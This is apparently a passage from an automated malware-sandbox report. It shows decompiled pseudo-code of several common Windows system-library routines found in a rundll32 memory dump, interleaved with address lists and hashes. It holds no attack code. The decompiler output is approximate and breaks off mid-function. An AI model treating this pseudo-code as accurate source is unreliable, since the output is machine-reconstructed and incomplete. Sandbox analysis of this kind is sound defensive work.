                                                                                                                0x04444a48
                                                                                                                0x04444a4b
                                                                                                                0x04444a4d
                                                                                                                0x04444a51
                                                                                                                0x04444a9c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04444aa3
                                                                                                                0x04444aa8
                                                                                                                0x04444aad
                                                                                                                0x04444ab1
                                                                                                                0x04444ade
                                                                                                                0x04444ae3
                                                                                                                0x04444a5a
                                                                                                                0x04444a62
                                                                                                                0x04444a6a
                                                                                                                0x04444a6e
                                                                                                                0x0447f203
                                                                                                                0x04444a84
                                                                                                                0x04444a88
                                                                                                                0x04444a89
                                                                                                                0x04444a8a
                                                                                                                0x04444a95
                                                                                                                0x04444a95
                                                                                                                0x04444a79
                                                                                                                0x04444a80
                                                                                                                0x04444af2
                                                                                                                0x04444af4
                                                                                                                0x04444af9
                                                                                                                0x04444aff
                                                                                                                0x04444b01
                                                                                                                0x04444b03
                                                                                                                0x04444b08
                                                                                                                0x0447f20a
                                                                                                                0x0447f212
                                                                                                                0x0447f216
                                                                                                                0x0447f216
                                                                                                                0x04444b08
                                                                                                                0x04444b13
                                                                                                                0x04444b1a
                                                                                                                0x0447f229
                                                                                                                0x0447f229
                                                                                                                0x04444b1a
                                                                                                                0x04444a82
                                                                                                                0x00000000
                                                                                                                0x04444a82
                                                                                                                0x04444ab7
                                                                                                                0x04444acd
                                                                                                                0x04444acd
                                                                                                                0x04444ad5
                                                                                                                0x04444ada
                                                                                                                0x00000000
                                                                                                                0x04444ada
                                                                                                                0x04444ac2
                                                                                                                0x04444acb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04444acb
                                                                                                                0x04444a53
                                                                                                                0x04444a53
                                                                                                                0x04444a58
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2d0116914e3d88419acacba6db13c1b6db195c802820211daa1c6fab90a726e2
                                                                                                                • Instruction ID: f939503230ed9666fb8c48ec209183699d15d25aa90f03c42affc490f2d03021
                                                                                                                • Opcode Fuzzy Hash: 2d0116914e3d88419acacba6db13c1b6db195c802820211daa1c6fab90a726e2
                                                                                                                • Instruction Fuzzy Hash: DD31EF323056509BFF21AE54CD40B2BF7A4FBC0714F50092BEA561B281DBB0F805CB96
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0443E730 Relevance: .1, Instructions: 89COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 74%
                                                                                                                			E0443E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E04449670() < 0) {
					L0445DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x44f7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L04424620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0443E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                                                                                0x0443e730
                                                                                                                0x0443e736
                                                                                                                0x0443e738
                                                                                                                0x0443e73d
                                                                                                                0x0443e73e
                                                                                                                0x0443e740
                                                                                                                0x0443e749
                                                                                                                0x0443e765
                                                                                                                0x0443e76a
                                                                                                                0x0443e76b
                                                                                                                0x0443e76c
                                                                                                                0x0443e76d
                                                                                                                0x0443e76e
                                                                                                                0x0443e76f
                                                                                                                0x0443e775
                                                                                                                0x0443e777
                                                                                                                0x0443e77e
                                                                                                                0x0447b675
                                                                                                                0x0443e784
                                                                                                                0x0443e784
                                                                                                                0x0443e789
                                                                                                                0x0443e7a8
                                                                                                                0x0443e7ac
                                                                                                                0x0443e807
                                                                                                                0x0443e7ae
                                                                                                                0x0443e7ae
                                                                                                                0x0443e7b1
                                                                                                                0x0443e7b4
                                                                                                                0x0443e7b9
                                                                                                                0x0443e7c0
                                                                                                                0x0443e7c4
                                                                                                                0x0443e7ca
                                                                                                                0x0443e7cc
                                                                                                                0x00000000
                                                                                                                0x0443e7d3
                                                                                                                0x0443e7d6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0443e7ff
                                                                                                                0x0443e802
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0443e7f9
                                                                                                                0x0443e7fc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0443e7f3
                                                                                                                0x0443e7f6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0443e7ed
                                                                                                                0x0443e7f0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0443e7e7
                                                                                                                0x0443e7ea
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0447b685
                                                                                                                0x0447b688
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0447b682
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0443e7cc
                                                                                                                0x0443e7d9
                                                                                                                0x0443e7dc
                                                                                                                0x0443e7de
                                                                                                                0x0443e7de
                                                                                                                0x0443e7ac
                                                                                                                0x0443e7e4
                                                                                                                0x0443e74b
                                                                                                                0x0443e751
                                                                                                                0x0443e759
                                                                                                                0x0443e761
                                                                                                                0x0443e761

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c39f6587a8b21a7cc35c0ca83f6850b1e702eb5051219bf67d9052dc7996563d
                                                                                                                • Instruction ID: 76a910d9cbad4aa69c2e71aeb921153792fc34dd15afe06981bb803025cb0b96
                                                                                                                • Opcode Fuzzy Hash: c39f6587a8b21a7cc35c0ca83f6850b1e702eb5051219bf67d9052dc7996563d
                                                                                                                • Instruction Fuzzy Hash: 13318C75A14249EFEB44CF69C840B9AB7E8FB09714F14825AF904CB341E635ED80CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0443BC2C Relevance: .1, Instructions: 88COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 67%
                                                                                                                			E0443BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x44f6100; // 0x48
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E04422280(0xd, 0x158cf1a0);
				_t41 =  *0x44f60f8; // 0x0
				if(_t41 != 0) {
					 *0x44f60f8 =  *_t41;
					 *0x44f60fc =  *0x44f60fc + 0xffff;
				}
				E0441FFB0(_t41, 0x800, 0x158cf1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x44f60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L04424620(0x44f6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x44f6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                                                                                0x0443bc36
                                                                                                                0x0443bc42
                                                                                                                0x0443bc45
                                                                                                                0x0443bc4a
                                                                                                                0x0443bd35
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0443bc50
                                                                                                                0x0443bc50
                                                                                                                0x0443bc58
                                                                                                                0x0443bc5a
                                                                                                                0x0443bc60
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0447a4f2
                                                                                                                0x0447a4f6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0447a4fc
                                                                                                                0x0443bc79
                                                                                                                0x0443bc7e
                                                                                                                0x0443bc86
                                                                                                                0x0443bd16
                                                                                                                0x0443bd20
                                                                                                                0x0443bd20
                                                                                                                0x0443bc8d
                                                                                                                0x0443bc94
                                                                                                                0x0443bcbd
                                                                                                                0x0443bcca
                                                                                                                0x0443bccb
                                                                                                                0x0443bccc
                                                                                                                0x0443bccd
                                                                                                                0x0443bcce
                                                                                                                0x0443bcd4
                                                                                                                0x0443bcea
                                                                                                                0x0443bcee
                                                                                                                0x0443bcf2
                                                                                                                0x0443bd00
                                                                                                                0x0443bd04
                                                                                                                0x00000000
                                                                                                                0x0443bc96
                                                                                                                0x0443bcab
                                                                                                                0x0443bcaf
                                                                                                                0x0443bd2c
                                                                                                                0x0443bd2c
                                                                                                                0x0443bd09
                                                                                                                0x00000000
                                                                                                                0x0443bd09
                                                                                                                0x0443bcb1
                                                                                                                0x0443bcb5
                                                                                                                0x0443bcbb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0443bcbb

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: da85bb140666683ce110da1dffb49775961bb77425af25fded508758e3b48b9c
                                                                                                                • Instruction ID: 20d052f95633bb5ec058795a809316deb72a551b0ba61699d39fab6652ab820d
                                                                                                                • Opcode Fuzzy Hash: da85bb140666683ce110da1dffb49775961bb77425af25fded508758e3b48b9c
                                                                                                                • Instruction Fuzzy Hash: 613101326006959FEF21DF58D4807A673A4FB08716F15407AED48DB302EB79FD068B90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04431DB5 Relevance: .1, Instructions: 87COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 60%
                                                                                                                			E04431DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0442F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L04424620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0442F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                                                                                0x04431dc2
                                                                                                                0x04431dc5
                                                                                                                0x04431dc7
                                                                                                                0x04431dcc
                                                                                                                0x04431dce
                                                                                                                0x04431dd6
                                                                                                                0x04431ddf
                                                                                                                0x04431de0
                                                                                                                0x04431de1
                                                                                                                0x04431de5
                                                                                                                0x04431de8
                                                                                                                0x04431def
                                                                                                                0x04431df0
                                                                                                                0x04431df6
                                                                                                                0x04431df7
                                                                                                                0x04431dfe
                                                                                                                0x04431e1a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04431e0b
                                                                                                                0x04431e12
                                                                                                                0x04431e12
                                                                                                                0x04431e00
                                                                                                                0x04431e00
                                                                                                                0x04431e05
                                                                                                                0x04431e1e
                                                                                                                0x04431e23
                                                                                                                0x0447570f
                                                                                                                0x04475713
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04475719
                                                                                                                0x04475719
                                                                                                                0x04431e2c
                                                                                                                0x04431e2d
                                                                                                                0x04431e2e
                                                                                                                0x04431e2f
                                                                                                                0x04431e31
                                                                                                                0x04431e32
                                                                                                                0x04431e35
                                                                                                                0x04431e3d
                                                                                                                0x04475723
                                                                                                                0x0447573d
                                                                                                                0x0447573d
                                                                                                                0x00000000
                                                                                                                0x04475723
                                                                                                                0x04431e49
                                                                                                                0x04431e4e
                                                                                                                0x04431e4e
                                                                                                                0x04431e09
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                                                • Instruction ID: ec92fd12c2c57d36782bdf63d18da98fc235cb8ce6bbfc7a96ed39149b14781c
                                                                                                                • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                                                • Instruction Fuzzy Hash: F821B531600118FFEB20CF5ACD81EABBBBDEF89B45F514056E50597610DA35BE01DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04409100 Relevance: .1, Instructions: 87COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E04409100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x44df6e8);
				E0445D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E044D88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0445D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x44f86c0; // 0x3507b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x44f86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E04422280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E044D88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0444AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x44fb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x44f84c0;
										if(_t69 >=  *0x44f84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E044D9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0440922A(_t82);
							_t53 = E04427D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E044D8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x44f86c0; // 0x3507b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x44f86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x44f86bc;
										_t72 = 0x44f86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E04409240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x44f86c4;
									_t72 = 0x44f86c0;
									L18:
									E04439B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                                                                                0x04409100
                                                                                                                0x04409100
                                                                                                                0x04409100
                                                                                                                0x04409100
                                                                                                                0x04409102
                                                                                                                0x04409107
                                                                                                                0x0440910c
                                                                                                                0x04409110
                                                                                                                0x04409115
                                                                                                                0x04409136
                                                                                                                0x04409143
                                                                                                                0x044637e4
                                                                                                                0x044637e4
                                                                                                                0x04409149
                                                                                                                0x0440914e
                                                                                                                0x0440914e
                                                                                                                0x04409117
                                                                                                                0x0440911d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0440911f
                                                                                                                0x04409125
                                                                                                                0x00000000
                                                                                                                0x04409151
                                                                                                                0x04409158
                                                                                                                0x0440915d
                                                                                                                0x04409161
                                                                                                                0x04409168
                                                                                                                0x04463715
                                                                                                                0x00000000
                                                                                                                0x0440916e
                                                                                                                0x0440916e
                                                                                                                0x04409175
                                                                                                                0x04409177
                                                                                                                0x0440917e
                                                                                                                0x0440917f
                                                                                                                0x04409182
                                                                                                                0x04409182
                                                                                                                0x04409187
                                                                                                                0x04409187
                                                                                                                0x0440918a
                                                                                                                0x0440918d
                                                                                                                0x0440918f
                                                                                                                0x04409192
                                                                                                                0x04409195
                                                                                                                0x04409198
                                                                                                                0x04409198
                                                                                                                0x04409198
                                                                                                                0x0440919a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0446371f
                                                                                                                0x04463721
                                                                                                                0x04463727
                                                                                                                0x0446372f
                                                                                                                0x04463733
                                                                                                                0x04463735
                                                                                                                0x04463738
                                                                                                                0x0446373b
                                                                                                                0x0446373d
                                                                                                                0x04463740
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04463746
                                                                                                                0x04463749
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0446374f
                                                                                                                0x04463751
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04463757
                                                                                                                0x04463759
                                                                                                                0x0446375c
                                                                                                                0x0446375c
                                                                                                                0x0446375e
                                                                                                                0x0446375e
                                                                                                                0x04463761
                                                                                                                0x04463764
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04463766
                                                                                                                0x04463768
                                                                                                                0x044637a3
                                                                                                                0x044637a3
                                                                                                                0x044637a5
                                                                                                                0x044637a7
                                                                                                                0x044637ad
                                                                                                                0x044637b0
                                                                                                                0x044637b2
                                                                                                                0x044637bc
                                                                                                                0x044637c2
                                                                                                                0x044637c2
                                                                                                                0x044637b2
                                                                                                                0x04409187
                                                                                                                0x04409187
                                                                                                                0x0440918a
                                                                                                                0x0440918d
                                                                                                                0x0440918f
                                                                                                                0x04409192
                                                                                                                0x04409195
                                                                                                                0x00000000
                                                                                                                0x04409195
                                                                                                                0x00000000
                                                                                                                0x04409187
                                                                                                                0x0446376a
                                                                                                                0x0446376a
                                                                                                                0x0446376c
                                                                                                                0x0446376c
                                                                                                                0x0446376f
                                                                                                                0x04463775
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04463777
                                                                                                                0x04463779
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04463782
                                                                                                                0x04463787
                                                                                                                0x04463789
                                                                                                                0x04463790
                                                                                                                0x04463790
                                                                                                                0x0446378b
                                                                                                                0x0446378b
                                                                                                                0x0446378b
                                                                                                                0x04463792
                                                                                                                0x04463795
                                                                                                                0x04463795
                                                                                                                0x04463798
                                                                                                                0x04463798
                                                                                                                0x0446379b
                                                                                                                0x0446379b
                                                                                                                0x044091a3
                                                                                                                0x044091a9
                                                                                                                0x044091b0
                                                                                                                0x044091b4
                                                                                                                0x044091b4
                                                                                                                0x044091bb
                                                                                                                0x044091c0
                                                                                                                0x044091c5
                                                                                                                0x044091c7
                                                                                                                0x044637da
                                                                                                                0x044091cd
                                                                                                                0x044091cd
                                                                                                                0x044091cd
                                                                                                                0x044091d2
                                                                                                                0x044091d5
                                                                                                                0x04409239
                                                                                                                0x04409239
                                                                                                                0x044091d7
                                                                                                                0x044091db
                                                                                                                0x044091e1
                                                                                                                0x044091e7
                                                                                                                0x044091fd
                                                                                                                0x04409203
                                                                                                                0x0440921e
                                                                                                                0x04409223
                                                                                                                0x00000000
                                                                                                                0x04409223
                                                                                                                0x04409205
                                                                                                                0x04409208
                                                                                                                0x0440920c
                                                                                                                0x04409214
                                                                                                                0x04409214
                                                                                                                0x044091e9
                                                                                                                0x044091e9
                                                                                                                0x044091ee
                                                                                                                0x044091f3
                                                                                                                0x044091f3
                                                                                                                0x044091f3
                                                                                                                0x044091e7
                                                                                                                0x00000000
                                                                                                                0x044091db
                                                                                                                0x04409187
                                                                                                                0x04409168

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 62a591a9bf7b230dd577815107b84a87938ac3c1977fecdc613ae2d1e864f152
                                                                                                                • Instruction ID: 158ee61045ecc5dee5862ad284f9e97ed35c8560e517d42f66ef7db75e69b1e0
                                                                                                                • Opcode Fuzzy Hash: 62a591a9bf7b230dd577815107b84a87938ac3c1977fecdc613ae2d1e864f152
                                                                                                                • Instruction Fuzzy Hash: C9317EB1B012849FFF21EF69C4487AEB7B1BB49315F18C56BC4156B382C334B9908B52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04420050 Relevance: .1, Instructions: 81COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 53%
                                                                                                                			E04420050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
